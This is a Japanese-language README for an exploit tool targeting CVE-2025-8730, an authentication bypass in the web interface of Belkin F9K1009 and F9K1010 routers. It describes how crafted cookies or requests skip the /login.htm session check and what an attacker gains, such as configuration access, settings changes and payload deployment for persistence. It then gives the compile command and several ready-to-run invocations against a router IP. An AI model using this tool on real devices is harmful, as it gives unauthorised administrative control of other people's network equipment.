
Belkin F9K1009およびF9K1010ルーターのWebインターフェースにおける認証バイパス脆弱性を示すエクスプロイト。
著者: Byte Reaper
このリポジトリには、Belkin F9K1009 および F9K1010 ルーターの Web インターフェースに影響を与える重大な認証バイパスの脆弱性である CVE‑2025‑8730 の エクスプロイトが含まれています。
この欠陥は /login.htm ファイルのセッション検証ロジックにあり、不適切に処理されたクッキーまたは細工されたリクエストにより、攻撃者はログインチェックをバイパスし、有効な認証情報なしで管理インターフェースへの完全なアクセスを取得できます。
この脆弱性により、リモートの攻撃者(ネットワークアクセスを持つ)は以下が可能になります:
機密構成データへのアクセス
ルーター設定の変更
永続化または横方向移動のためのさらなるペイロードの展開
NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-8730
gcc exploit.c argparse.c -o CVE-2025-8730 -lcurl
./CVE-2025-8730 -i 192.168.1.1
Verbose Mode :
./CVE-2025-8730 -i 192.168.1.1 -v -c [cookie file]
Full URl :
./CVE-2025-8730 -f http://<IP>/<LOGIN_FILE>
Sleep (second):
./CVE-2025-8730 -i 192.168.1.1 -s 1
Number Request (For loop), example 10 Request POST :
./CVE-2025-8730 -i 192.168.1.1 -k 10 -s 1 -v
ライセンス:
MIT ライセンス